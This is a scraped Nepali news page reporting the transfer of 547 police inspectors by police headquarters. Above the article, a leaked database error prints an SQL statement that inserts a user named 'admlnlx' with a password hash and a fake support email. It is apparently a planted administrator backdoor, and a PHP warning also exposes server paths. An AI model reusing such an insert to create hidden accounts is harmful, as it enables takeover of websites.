WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQKmhWGKRo2Eakkn2v.9U1UhAJGvni1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-26 02:47:08', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
५ सय ४७ प्रहरी निरिक्षकको सरुवा – Gaule Khabar

५ सय ४७ प्रहरी निरिक्षकको सरुवा

५ सय ४७ प्रहरी निरिक्षकको सरुवा

काठमाडौं,पुस ८-

प्रहरी प्रधान कार्यालयले ५ सय ४७ प्रहरी निरिक्षकको सरुवा गरेको छ। शुक्रवार प्रधान कार्यालयले एकै समयमा ५ सय ४७ प्रहरी निरिक्षकको सरुवा निकालेको हो।प्रहरी महानिरिक्षक उपेन्द्रकान्त अर्यालको कार्यकालको यो सबैभन्दा ठुलो सरुवा हो ।

सरुवा भएको १६ महिना टेके पनि वरिष्ठ प्रहरी उपरिक्षकको सरुवा भने हुन सकेको छैन । महानगरीय प्रहरी महाशाखा र महानगरीय प्रहरी परिसर काठमाण्डौं र ललितपुरको प्रमुखमा विवादहुँदा एसएसपीको सरुवा रोकिएको हो।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका